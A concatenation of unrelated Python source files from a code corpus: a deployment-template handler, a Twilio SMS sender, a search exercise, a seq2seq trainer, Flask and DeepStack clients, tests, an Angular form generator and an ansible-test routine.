options['parameters']\n github = options['github']\n target_ref = target['ref']\n environment = target['namespace']['environment']\n environment_parameters = self._collect_parameters(environment)\n target_parameters = self._collect_parameters(target)\n\n consolidated_parameters = {}\n consolidated_parameters.update(environment_parameters)\n consolidated_parameters.update(parameters)\n consolidated_parameters.update(target_parameters)\n\n try:\n get_file_contents_options = {\n 'url': url,\n 'path': path,\n 'ref': target_ref,\n 'github': github\n }\n content, html_url = \\\n self._get_file_contents(get_file_contents_options)\n except Exception as e:\n logging.error(\n f\"[{url}/{path}:{target_ref}] \" +\n f\"error fetching 
template: {str(e)}\")\n return None, None\n\n template = yaml.safe_load(content)\n if \"IMAGE_TAG\" not in consolidated_parameters:\n for template_parameter in template['parameters']:\n if template_parameter['name'] == 'IMAGE_TAG':\n # add IMAGE_TAG only if it is required\n get_commit_sha_options = {\n 'url': url,\n 'ref': target_ref,\n 'hash_length': hash_length,\n 'github': github\n }\n image_tag = self._get_commit_sha(get_commit_sha_options)\n consolidated_parameters['IMAGE_TAG'] = image_tag\n oc = OC('server', 'token')\n try:\n resources = oc.process(template, consolidated_parameters)\n except StatusCodeError as e:\n resources = None\n logging.error(\n f\"[{saas_file_name}/{resource_template_name}] {html_url}: \" +\n f\"error processing template: {str(e)}\")\n return resources, html_url\n\n def _collect_images(self, resource):\n images = set()\n # resources with pod templates\n try:\n template = resource[\"spec\"][\"template\"]\n for c in template[\"spec\"][\"containers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # init containers\n try:\n template = resource[\"spec\"][\"template\"]\n for c in template[\"spec\"][\"initContainers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # CronJob\n try:\n template = resource[\"spec\"][\"jobTemplate\"][\"spec\"][\"template\"]\n for c in template[\"spec\"][\"containers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # CatalogSource templates\n try:\n images.add(resource[\"spec\"][\"image\"])\n except KeyError:\n pass\n\n return images\n\n def _check_images(self, options):\n saas_file_name = options['saas_file_name']\n resource_template_name = options['resource_template_name']\n html_url = options['html_url']\n resource = options['resource']\n image_auth = options['image_auth']\n image_patterns = options['image_patterns']\n error_prefix = \\\n f\"[{saas_file_name}/{resource_template_name}] {html_url}:\"\n error = False\n images = self._collect_images(resource)\n if image_auth:\n username 
= image_auth['user']\n password = image_auth['token']\n else:\n username = None\n password = None\n for image in images:\n if image_patterns and \\\n not any(image.startswith(p) for p in image_patterns):\n error = True\n logging.error(\n f\"{error_prefix} Image is not in imagePatterns: {image}\")\n try:\n valid = Image(image, username=username, password=password)\n if not valid:\n error = True\n logging.error(\n f\"{error_prefix} Image does not exist: {image}\")\n continue\n except Exception:\n error = True\n logging.error(f\"{error_prefix} Image is invalid: {image}\")\n continue\n return error\n\n def _initiate_github(self, saas_file):\n auth = saas_file.get('authentication') or {}\n auth_code = auth.get('code') or {}\n if auth_code:\n token = secret_reader.read(auth_code, settings=self.settings)\n else:\n # use the app-sre token by default\n default_org_name = 'app-sre'\n config = get_config(desired_org_name=default_org_name)\n token = config['github'][default_org_name]['token']\n\n base_url = os.environ.get('GITHUB_API', 'https://api.github.com')\n return Github(token, base_url=base_url)\n\n def _initiate_image_auth(self, saas_file):\n auth = saas_file.get('authentication') or {}\n auth_image = auth.get('image') or {}\n if auth_image:\n creds = \\\n secret_reader.read_all(auth_image, settings=self.settings)\n else:\n creds = None\n return creds\n\n def populate_desired_state(self, ri):\n threaded.run(self.populate_desired_state_saas_file,\n self.saas_files,\n self.thread_pool_size,\n ri=ri)\n\n def populate_desired_state_saas_file(self, saas_file, ri):\n saas_file_name = saas_file['name']\n logging.debug(f\"populating desired state for {saas_file_name}\")\n github = self._initiate_github(saas_file)\n image_auth = self._initiate_image_auth(saas_file)\n managed_resource_types = saas_file['managedResourceTypes']\n image_patterns = saas_file['imagePatterns']\n resource_templates = saas_file['resourceTemplates']\n saas_file_parameters = 
self._collect_parameters(saas_file)\n # iterate over resource templates (multiple per saas_file)\n for rt in resource_templates:\n rt_name = rt['name']\n url = rt['url']\n path = rt['path']\n hash_length = rt.get('hash_length') or self.settings['hashLength']\n parameters = self._collect_parameters(rt)\n\n consolidated_parameters = {}\n consolidated_parameters.update(saas_file_parameters)\n consolidated_parameters.update(parameters)\n\n # iterate over targets (each target is a namespace)\n for target in rt['targets']:\n cluster, namespace = \\\n self._get_cluster_and_namespace(target)\n process_template_options = {\n 'saas_file_name': saas_file_name,\n 'resource_template_name': rt_name,\n 'url': url,\n 'path': path,\n 'hash_length': hash_length,\n 'target': target,\n 'parameters': consolidated_parameters,\n 'github': github\n }\n resources, html_url = \\\n self._process_template(process_template_options)\n if resources is None:\n ri.register_error()\n continue\n # add desired resources\n for resource in resources:\n resource_kind = resource['kind']\n if resource_kind not in managed_resource_types:\n continue\n # check images\n check_images_options = {\n 'saas_file_name': saas_file_name,\n 'resource_template_name': rt_name,\n 'html_url': html_url,\n 'resource': resource,\n 'image_auth': image_auth,\n 'image_patterns': image_patterns\n }\n image_error = self._check_images(check_images_options)\n if image_error:\n ri.register_error()\n continue\n resource_name = resource['metadata']['name']\n oc_resource = OR(\n resource,\n self.integration,\n self.integration_version,\n caller_name=saas_file_name,\n error_details=html_url)\n ri.add_desired(\n cluster,\n namespace,\n resource_kind,\n resource_name,\n oc_resource\n )\n\n def get_moving_commits_diff(self, dry_run):\n results = threaded.run(self.get_moving_commits_diff_saas_file,\n self.saas_files,\n self.thread_pool_size,\n dry_run=dry_run)\n return [item for sublist in results for item in sublist]\n\n def 
get_moving_commits_diff_saas_file(self, saas_file, dry_run):\n saas_file_name = saas_file['name']\n instace_name = saas_file['instance']['name']\n github = self._initiate_github(saas_file)\n trigger_specs = []\n for rt in saas_file['resourceTemplates']:\n rt_name = rt['name']\n url = rt['url']\n for target in rt['targets']:\n # don't trigger if there is a linked upstream job\n if target.get('upstream'):\n continue\n ref = target['ref']\n get_commit_sha_options = {\n 'url': url,\n 'ref': ref,\n 'github': github\n }\n desired_commit_sha = \\\n self._get_commit_sha(get_commit_sha_options)\n # don't trigger on refs which are commit shas\n if ref == desired_commit_sha:\n continue\n namespace = target['namespace']\n cluster_name = namespace['cluster']['name']\n namespace_name = namespace['name']\n env_name = namespace['environment']['name']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}/{ref}\"\n current_commit_sha = self.state.get(key, None)\n # skip if there is no change in commit sha\n if current_commit_sha == desired_commit_sha:\n continue\n # don't trigger if this is the first time\n # this target is being deployed.\n # that will be taken care of by\n # openshift-saas-deploy-trigger-configs\n if current_commit_sha is None:\n # store the value to take over from now on\n if not dry_run:\n self.state.add(key, value=desired_commit_sha)\n continue\n # we finally found something we want to trigger on!\n job_spec = {\n 'saas_file_name': saas_file_name,\n 'env_name': env_name,\n 'instance_name': instace_name,\n 'rt_name': rt_name,\n 'cluster_name': cluster_name,\n 'namespace_name': namespace_name,\n 'ref': ref,\n 'commit_sha': desired_commit_sha\n }\n trigger_specs.append(job_spec)\n\n return trigger_specs\n\n def update_moving_commit(self, job_spec):\n saas_file_name = job_spec['saas_file_name']\n env_name = job_spec['env_name']\n rt_name = job_spec['rt_name']\n cluster_name = job_spec['cluster_name']\n namespace_name = 
job_spec['namespace_name']\n ref = job_spec['ref']\n commit_sha = job_spec['commit_sha']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}/{ref}\"\n self.state.add(key, value=commit_sha, force=True)\n\n def get_configs_diff(self):\n results = threaded.run(self.get_configs_diff_saas_file,\n self.saas_files,\n self.thread_pool_size)\n return [item for sublist in results for item in sublist]\n\n def get_configs_diff_saas_file(self, saas_file):\n saas_file_name = saas_file['name']\n saas_file_parameters = saas_file.get('parameters')\n instace_name = saas_file['instance']['name']\n trigger_specs = []\n for rt in saas_file['resourceTemplates']:\n rt_name = rt['name']\n rt_parameters = rt.get('parameters')\n for desired_target_config in rt['targets']:\n namespace = desired_target_config['namespace']\n cluster_name = namespace['cluster']['name']\n namespace_name = namespace['name']\n env_name = namespace['environment']['name']\n # add parent parameters to target config\n desired_target_config['saas_file_parameters'] = \\\n saas_file_parameters\n desired_target_config['rt_parameters'] = rt_parameters\n # get current target config from state\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}\"\n current_target_config = self.state.get(key, None)\n # skip if there is no change in target configuration\n if current_target_config == desired_target_config:\n continue\n job_spec = {\n 'saas_file_name': saas_file_name,\n 'env_name': env_name,\n 'instance_name': instace_name,\n 'rt_name': rt_name,\n 'cluster_name': cluster_name,\n 'namespace_name': namespace_name,\n 'target_config': desired_target_config\n }\n trigger_specs.append(job_spec)\n\n return trigger_specs\n\n def update_config(self, job_spec):\n saas_file_name = job_spec['saas_file_name']\n env_name = job_spec['env_name']\n rt_name = job_spec['rt_name']\n cluster_name = job_spec['cluster_name']\n namespace_name = 
job_spec['namespace_name']\n target_config = job_spec['target_config']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}\"\n self.state.add(key, value=target_config, force=True)\n","sub_path":"utils/saasherder.py","file_name":"saasherder.py","file_ext":"py","file_size_in_byte":20658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"593147588","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 5 15:10:43 2015\n\n@author: Preto\n\"\"\"\n\nimport twilio\nimport twilio.rest\n \naccount_sid = \"\"\nauth_token = \"\"\n\n\ntry:\n client = twilio.rest.TwilioRestClient(account_sid, auth_token)\n \n message = client.messages.create(\n body=\"Alerta de Prueba.\",\n to=\"+34666666666\",\n from_=\"+1500000000\"\n )\n \nexcept twilio.TwilioRestException as e:\n print(e)\n \n","sub_path":"Twilio/twilio-sms.py","file_name":"twilio-sms.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"492953475","text":"#!/usr/bin/python 3.6\n# coding: utf-8\n#\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # #\n# # MESTRADO EM CIENCIAS DA COMPUTACAO #\n# # DISCIPLINA DE INTELIGÊNCIA ARTIFICIAL #\n# # Thiago Giroto Milani - 02/2017 #\n# # tmilani@rc.unesp.br #\n# # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\nnodes = {}\n\nif __name__ == \"__main__\":\n with open(\"coordenadas.txt\") as arquivo:\n linha = arquivo.readline()\n while (linha != \"\"):\n # PEGA NODE VIZINHOS DO NODE ATUAL\n vizinhos = linha.split(\";\")[1]\n # SEPARA CADA TUPLA DE DISTANCIA DO NODE\n lista_vizinhos = vizinhos.split(\",\")\n tupla_viz = []\n for i in range(len(lista_vizinhos)):\n vizinho = str(lista_vizinhos[i]).rstrip(\"\\n\")\n #PEGA O NODE E A DISTANCIA DO NO ATUAL\n tupla_viz.append((vizinho.split(\" \")[0],vizinho.split(\" \")[1])) \n 
nodes[linha.split(\";\")[0]] = tupla_viz \n linha = arquivo.readline()\n \n pilha = []\n caminho = []\n #INICIA O NODE\n pilha.append(\"i\")\n while pilha[0][0] != \"f\":\n print(\"Pilha \",pilha,\"\\n\")\n # REMOVE O ULTIMO ELEMENTO DA PILHA\n caminho.append(pilha.pop(0))\n print(\"Expandindo a pilha \",caminho[-1][0])\n if nodes.get(caminho[-1][0]) == None:\n caminho.pop(-1)\n print(\"Fim do Caminho\")\n else:\n for i in range(len(nodes.get(caminho[-1][0]))):\n #SELECIONA A PILHA DE VIZINHOS\n pilha.append(nodes.get(caminho[-1][0])[i])\n pilha = sorted(pilha, key=lambda pilha: pilha[1])\n caminho.append(pilha[0]) \n print(\"\\nCaminho até F: \",caminho) \n \n\n \n \n \n","sub_path":"Buscas IA/branch-and-bound.py","file_name":"branch-and-bound.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580520179","text":"import os\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm\nfrom dataset import dataset_factory\nfrom model.model import Encoder, Decoder, Seq2Seq\nfrom util import cuda\n\n\ndef save_model(model, epoch, val_loss):\n if not os.path.isdir('.save'):\n os.makedirs('.save')\n torch.save(model.state_dict(), \".save/seq2seq-%d-%f.pt\" % (epoch, val_loss))\n\n\ndef evaluate(model, val_iter, vocab_size, padding_idx):\n model.eval() # put model in eval mode (this is important because of dropout)\n\n total_loss = 0\n for batch in val_iter:\n # calculate model predictions\n question, answer = cuda(batch.question), cuda(batch.answer)\n outputs = model(question, answer)\n\n # calculate batch loss\n loss = F.nll_loss(outputs.view(-1, vocab_size), answer[1:].view(-1),\n ignore_index=padding_idx) # answer[1:] skip token\n total_loss += loss.data[0]\n\n return total_loss / len(val_iter)\n\n\ndef train(model, optimizer, train_iter, vocab_size, grad_clip, padding_idx):\n model.train() # put model in train 
mode (this is important because of dropout)\n\n optimizer.zero_grad()\n total_loss = 0\n for batch in train_iter:\n # calculate model predictions\n question, answer = cuda(batch.question), cuda(batch.answer)\n outputs = model(question, answer)\n\n # calculate loss and backpropagate errors\n loss = F.nll_loss(outputs.view(-1, vocab_size), answer[1:].view(-1),\n ignore_index=padding_idx) # answer[1:] skip token\n loss.backward()\n\n total_loss += loss.data[0]\n\n # clip gradients to avoid exploding gradient\n clip_grad_norm(model.parameters(), grad_clip)\n\n # update parameters\n optimizer.step()\n\n return total_loss / len(train_iter)\n\n\ndef main():\n vocab, train_iter, val_iter, test_iter = dataset_factory('twitter-customer-support')\n\n epochs = 100\n embedding_size = 20\n hidden_size = 100\n vocab_size = len(vocab)\n padding_idx = vocab.stoi['']\n\n encoder = Encoder(vocab_size, embedding_size, hidden_size)\n decoder = Decoder(vocab_size, embedding_size, hidden_size)\n seq2seq = cuda(Seq2Seq(encoder, decoder, vocab_size))\n\n optimizer = optim.Adam(seq2seq.parameters())\n\n best_val_loss = None\n for epoch in range(epochs):\n # calculate train and val loss\n train_loss = train(seq2seq, optimizer, train_iter, vocab_size, 5, padding_idx)\n val_loss = evaluate(seq2seq, val_iter, vocab_size, padding_idx)\n print(\"[Epoch=%d] train_loss %f - val_loss %f\" % (epoch, train_loss, val_loss))\n\n # save model if model achieved best val loss\n if not best_val_loss or val_loss < best_val_loss:\n print('Saving model...')\n save_model(seq2seq, epoch, val_loss)\n best_val_loss = val_loss\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"336401461","text":"\nfrom gen_utils import *\nfrom allcharset import *\n\nif 1:\n #random.shuffle(fontfiles)\n #fontfiles = fontfiles[:200] + 
['huawenxihei.ttf', 'fz-v4.0.ttf']\n outpath = 'D:/OCR_Line/lines/han200w'\n\n\ndef savelines(labels, outtxt):\n f = open(outtxt, 'w')\n for s in labels:\n # print(s)\n f.write(s+'\\n')\n f.close()\n\n\n\ndef loadlines(txtfn):\n f = open(txtfn, 'r')\n labels = f.readlines()\n f.close()\n for i in range(0, len(labels)):\n aa = labels[i]\n bb = aa.split(\" \")[0:-1]\n cc = \" \".join(bb)\n labels[i] = cc\n return labels\n\nimgoutpath = outpath+'/img'\nroot = outpath + '/'\n\nlabels = loadlines(root + '/infos.txt')\nif 1:\n\tcount = len(labels)\n\tcount_train = int(count*0.8)\n\n\troot = outpath + '/'\n\touttxt = root+'list.txt'\n\tsavelines(labels[:count_train], root+'train.txt')\n\tsavelines(labels[count_train:], root+'test.txt')\n\n\tlabels = ['blank']\n\n","sub_path":"include/ocr/train/chinese_fonts/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98443776","text":"import os\nimport json\nfrom random import sample\n\nfrom flask import render_template, request\n\nfrom app import app, redis_conn\nfrom app.docker.run_docker import run_docker_script\n\nCARDS_HASH_NAME = '_cards'\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/random')\ndef random():\n cards = {}\n cards_path = os.path.join(app.static_folder, 'resources', 'cards.json')\n with open(cards_path) as raw_cards:\n cards = json.load(raw_cards)\n\n result = [cards[i] for i in sample(range(len(cards)), 3)]\n\n return {'cards': result}\n\n\n@app.route('/create_container')\ndef create_container():\n res = run_docker_script()\n\n return {'container_id': res}\n\n\n@app.route('/load_cards')\ndef load_cards():\n cards_path = os.path.join(app.static_folder, 'resources', 'cards.json')\n with open(cards_path) as raw_cards:\n cards = json.load(raw_cards)\n\n [redis_conn.hset(CARDS_HASH_NAME, card['title'],\n 
json.dumps(card['effects'])) for card in cards]\n\n return 'OK'\n\n\n@app.route('/redis', methods=['GET'])\ndef redis_get():\n if request.args.get('cards'):\n raw_cards = redis_conn.hgetall(CARDS_HASH_NAME)\n presentable = []\n\n for k, v in raw_cards.items():\n presentable.append({k: json.loads(v)})\n return {\n 'result': presentable\n }\n\n key = request.args.get('key')\n value = redis_conn.get(key)\n\n return {\n 'result': value.decode(\"utf-8\").strip()\n }\n\n\n@app.route('/redis', methods=['POST'])\ndef redis_set():\n key = request.json['key']\n value = request.json['value']\n redis_conn.set(key, value)\n\n return {\n 'result': f'set {key}={value}'\n }\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"386015588","text":"from PIL import Image\nimport cv2 \nfrom .config import ServerConfig\nfrom .utils import cv2ToBytes, pilToBytes\nfrom .structs import SceneResponse\nimport requests\nimport os\nimport validators\nimport numpy\n\nclass SceneRecognition(object):\n def __init__(self,config: ServerConfig):\n self.config = config\n\n def __process_image(self,image_data: bytes):\n response = requests.post(self.config.server_url+\"v1/vision/scene\",\n files={\"image\": image_data},\n data={\"api_key\": self.config.api_key}\n )\n\n return response\n\n \n def processImage(self, image,format=\"jpg\", callback=None):\n if isinstance(image,str):\n if os.path.isfile(image):\n image_data = open(image,\"rb\").read()\n elif validators.url(image):\n image_data = requests.get(image).content\n else:\n raise Exception(\"String input is neigther a file nor a url\")\n elif isinstance(image,numpy.ndarray):\n image_data = cv2ToBytes(image,format=format)\n elif isinstance(image,Image):\n image_data = pilToBytes(image,format=format)\n else:\n raise Exception(\"Unsupported input type: {}\".format(type(image)))\n\n response = 
self.__process_image(image_data)\n\n if response.status_code == 200:\n data = SceneResponse(response.json())\n if callback is not None:\n callback(image_data,data)\n return data\n elif response.status_code == 403:\n raise Exception(\"The scene endpoint is not enabled on the DeepStack server\")\n elif response.status_code == 400:\n raise Exception(\"Invalid image\")\n elif response.status_code == 500:\n raise Exception(\"An error occured on the DeepStack server\")\n else:\n raise Exception(\"Unknown error : {} occured\".format(response.status_code))\n\n\n\n \n\n","sub_path":"deepstack/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295220843","text":"\"\"\"Tests for PyDaymet package.\"\"\"\nimport io\n\nimport pytest\nfrom shapely.geometry import Polygon\n\nimport pydaymet as daymet\n\n\n@pytest.fixture\ndef geometry():\n return Polygon(\n [[-69.77, 45.07], [-69.31, 45.07], [-69.31, 45.45], [-69.77, 45.45], [-69.77, 45.07]]\n )\n\n\n@pytest.fixture\ndef dates():\n return (\"2000-01-01\", \"2000-01-12\")\n\n\n@pytest.fixture\ndef variables():\n return [\"tmin\"]\n\n\ndef test_byloc(dates, variables):\n coords = (-1431147.7928, 318483.4618)\n crs = \"epsg:3542\"\n\n daymet.get_byloc(coords, dates, crs=crs)\n st_p = daymet.get_byloc(coords, dates, crs=crs, variables=variables, pet=True)\n yr_p = daymet.get_byloc(coords, 2010, crs=crs, variables=variables)\n assert (\n abs(st_p.iloc[10][\"pet (mm/day)\"] - 2.393) < 1e-3\n and abs(yr_p.iloc[10][\"tmin (deg c)\"] - 11.5) < 1e-1\n )\n\n\ndef test_bygeom(geometry, dates, variables):\n daymet.get_bygeom(geometry, dates)\n daymet.get_bygeom(geometry.bounds, dates)\n st_g = daymet.get_bygeom(geometry, dates, variables=variables, pet=True)\n yr_g = daymet.get_bygeom(geometry, 2010, variables=variables)\n assert (\n abs(st_g.isel(time=10, x=5, y=10).pet.values.item() - 0.596) < 1e-3\n and 
abs(yr_g.isel(time=10, x=5, y=10).tmin.values.item() - (-18.0)) < 1e-1\n )\n\n\ndef test_show_versions():\n f = io.StringIO()\n daymet.show_versions(file=f)\n assert \"INSTALLED VERSIONS\" in f.getvalue()\n","sub_path":"tests/test_pydaymet.py","file_name":"test_pydaymet.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449447677","text":"from __future__ import absolute_import\nfrom typing import List, Dict, Any, Optional\nfrom tinydb import TinyDB, Query\nfrom tinydb.operations import add, decrement, set\n\n\ndef takerank(x):\n return (int)(x[1])\n\n\ndb = TinyDB('data/list.json', indent=4)\nteamdata = Query()\nnow = db.all()\nteam = []\nfor i in now:\n team.append((\n i['chname'],\n i['rating'],\n ))\nteam.sort(key=takerank, reverse=True)\nfor i in team:\n print(f\"{i[0]} {i[1]}\")","sub_path":"showrating.py","file_name":"showrating.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"28059349","text":"from flask import Flask,render_template,request,redirect\nfrom flask_sqlalchemy import SQLAlchemy\nimport test\nimport math as m\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///file.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nclass Detections(db.Model):\n sno = db.Column(db.Integer,primary_key=True)\n glucose = db.Column(db.Integer,nullable=False)\n bp = db.Column(db.Integer,nullable=False)\n insulin = db.Column(db.Integer,nullable=False)\n bmi = db.Column(db.Float,nullable=False)\n age = db.Column(db.Integer,nullable=False)\n prob = db.Column(db.Integer,nullable=False)\n \n\n def __repr__(self) -> str:\n return f\"{self.sno} - {self.age}\"\n\n@app.route(\"/\",methods=['GET','POST'])\ndef detect():\n if request.method == \"POST\":\n glucose = int(request.form['glucose'])\n bp = int(request.form['bp'])\n 
insulin = int(request.form['insulin'])\n bmi = float(request.form['bmi'])\n age = int(request.form['age'])\n print(glucose,bp,insulin,bmi,age)\n prob = int(m.ceil((test.predict([[glucose,bp,insulin,bmi,age]])*100)))\n result = Detections(glucose=glucose,bp=bp,insulin=insulin,bmi=bmi,age=age,prob=prob)\n db.session.add(result)\n db.session.commit()\n return render_template('results.html',prob=prob)\n return render_template('detect.html')\n\n@app.route(\"/detections\")\ndef detections():\n p = Detections.query.all()\n return render_template('detections.html',p=p)\n\n'''@app.route(\"/results\")\ndef results():\n p = Detections.query.all()\n return render_template('detections.html',p=p)'''\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"638703611","text":"from app.utils.Util import source_code, required, ext_point, get_file_name, get_name, get_attr, is_ref, lowercase_first_letter\nfrom app.utils.FileUtil import FileUtil\n\nclass AppForm(object):\n\n def __init__(self, path, project, source_obj, template_data):\n self.path = path\n self.project = project\n self.source_obj = source_obj\n self.template_data = template_data\n self.file = get_file_name(self.source_obj['table']) + \".form.ts\"\n\n def proceed(self):\n path = self.path+self.file\n print(path);\n is_exists = FileUtil.is_exists(path);\n if is_exists:\n return False\n else:\n return True\n\n\n def final(self):\n template_file = FileUtil.template('angular', 'AppForm')\n output = source_code(self.template_data, template_file)\n print(\"-------------------------------------------------\")\n print(output)\n FileUtil.write_file(self.path, self.file, output);\n print(\"-------------------------------------------------\")\n\n\n def start(self):\n self.template_data['name'] = get_name(self.source_obj['table'])\n 
self.template_data['props'] = []\n print(self.template_data)\n\n def main(self):\n print(self.source_obj['props'])\n self.props_loop(self.template_data['attr']+'_', self.source_obj['props'])\n\n def main(self):\n props = self.source_obj['props']\n for item in props:\n self.service(item, self.template_data['name']+'_')\n\n def service(self, item, ext):\n if (is_ref(item['type'])):\n if (item['html'] == 'form' ):\n self.ref_service( item, ext)\n else:\n self.prop_service(self.template_data['props'], item, ext)\n\n def prop_service(self, source_arr, item, ext):\n if (item['name'].lower() == 'updatedby' or item['name'].lower() == 'updatedon'):\n return\n data = self.service_ext(item, ext)\n if data is not None:\n source_arr.append(data)\n\n def ref_service(self, item, ext):\n ext_source_obj = FileUtil.project_file(self.project, item['type'])\n for item in ext_source_obj['props']:\n self.service(item, ext+ext_source_obj['name']+'_')\n\n def service_ext(self, item, ext):\n if item['html'] == 'text' \\\n or item['html'] == 'number' \\\n or item['html'] == 'select' \\\n or item['html'].lower() == 'date':\n data = {'name': item['name']}\n data['extn'] = (ext + data['name']).lower()\n if item['type'] == 'string':\n data['validators'] = \"this.TYPE_DATA\"\n elif item['type'] == 'number':\n data['validators'] = \"this.TYPE_NUMBER\"\n else:\n data['validators'] = \"this.TYPE_ALL\"\n\n if item['length'] is not None:\n data['maxLength'] = item['length']\n else:\n data['maxLength'] = '15'\n return data\n else:\n return None","sub_path":"app/angular/exec/AppForm.py","file_name":"AppForm.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317176345","text":"#!/usr/bin/python3\nfrom platform import python_version\nimport subprocess\nimport time\nimport logging\nimport argparse\n\ndef xstr(s):\n return '' if s is None else str(s)\n\nnumeric_log_level = logging.INFO\nparser = 
argparse.ArgumentParser(description='Optional app description')\nparser.add_argument('--log', help='DEBUG or INFO or WARNING or ERROR or CRITICAL')\nargs = parser.parse_args()\nprint(\"commandline --log parameter: '\" + xstr(args.log) + \"'\")\nif isinstance(args.log, str):\n\tnumeric_log_level = getattr(logging, args.log.upper(), None)\n\tif not isinstance(numeric_log_level, int):\n\t\tnumeric_log_level = logging.INFO\n\n#print(numeric_log_level)\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=numeric_log_level,\n\thandlers=[logging.FileHandler(\"startBothTws.py.log\"),\n\t\t\tlogging.StreamHandler()])\n\nlogging.info(\"***** START *****\")\nlogging.info(\"Python version: \" + python_version())\n\nlogging.info(\"DcMain TWS: starting in a parallel subprocess.\");\nsubprocess.call(['/home/sq-vnc-client/opt/ibc/twsstartDcMain.sh'])\nlogging.info(\"DcMain TWS: started. Now sleep 100sec (50s may not enough)...\")\ntime.sleep(100)\n\nlogging.info(\"DeBlanzac TWS: starting in a parallel subprocess.\");\nsubprocess.call(['/home/sq-vnc-client/opt/ibc/twsstartDeBlanzac.sh'])\nlogging.info(\"***** END *****\");\n","sub_path":"admin/Linux/startBothTws.py","file_name":"startBothTws.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23186049","text":"\n\ndef command_integration_role(args, target, start_at_task, test_dir, inventory_path, temp_path):\n '\\n :type args: IntegrationConfig\\n :type target: IntegrationTarget\\n :type start_at_task: str | None\\n :type test_dir: str\\n :type inventory_path: str\\n :type temp_path: str\\n '\n display.info(('Running %s integration test role' % target.name))\n env_config = None\n vars_files = []\n variables = dict(output_dir=test_dir)\n if isinstance(args, WindowsIntegrationConfig):\n hosts = 'windows'\n gather_facts = False\n variables.update(dict(win_output_dir='C:\\\\ansible_testing'))\n elif isinstance(args, 
NetworkIntegrationConfig):\n hosts = target.name[:target.name.find('_')]\n gather_facts = False\n else:\n hosts = 'testhost'\n gather_facts = True\n cloud_environment = get_cloud_environment(args, target)\n if cloud_environment:\n env_config = cloud_environment.get_environment_config()\n with integration_test_environment(args, target, inventory_path) as test_env:\n if os.path.exists(test_env.vars_file):\n vars_files.append(os.path.relpath(test_env.vars_file, test_env.integration_dir))\n play = dict(hosts=hosts, gather_facts=gather_facts, vars_files=vars_files, vars=variables, roles=[target.name])\n if env_config:\n play.update(dict(vars=env_config.ansible_vars, environment=env_config.env_vars, module_defaults=env_config.module_defaults))\n playbook = json.dumps([play], indent=4, sort_keys=True)\n with named_temporary_file(args=args, directory=test_env.integration_dir, prefix=('%s-' % target.name), suffix='.yml', content=playbook) as playbook_path:\n filename = os.path.basename(playbook_path)\n display.info(('>>> Playbook: %s\\n%s' % (filename, playbook.strip())), verbosity=3)\n cmd = ['ansible-playbook', filename, '-i', os.path.relpath(test_env.inventory_path, test_env.integration_dir)]\n if start_at_task:\n cmd += ['--start-at-task', start_at_task]\n if args.tags:\n cmd += ['--tags', args.tags]\n if args.skip_tags:\n cmd += ['--skip-tags', args.skip_tags]\n if args.diff:\n cmd += ['--diff']\n if isinstance(args, NetworkIntegrationConfig):\n if args.testcase:\n cmd += ['-e', ('testcase=%s' % args.testcase)]\n if args.verbosity:\n cmd.append(('-' + ('v' * args.verbosity)))\n env = integration_environment(args, target, test_dir, test_env.inventory_path, test_env.ansible_config, env_config)\n cwd = test_env.integration_dir\n env['ANSIBLE_ROLES_PATH'] = os.path.abspath(os.path.join(test_env.integration_dir, 'targets'))\n module_coverage = ('non_local/' not in target.aliases)\n intercept_command(args, cmd, target_name=target.name, env=env, cwd=cwd, temp_path=temp_path, 
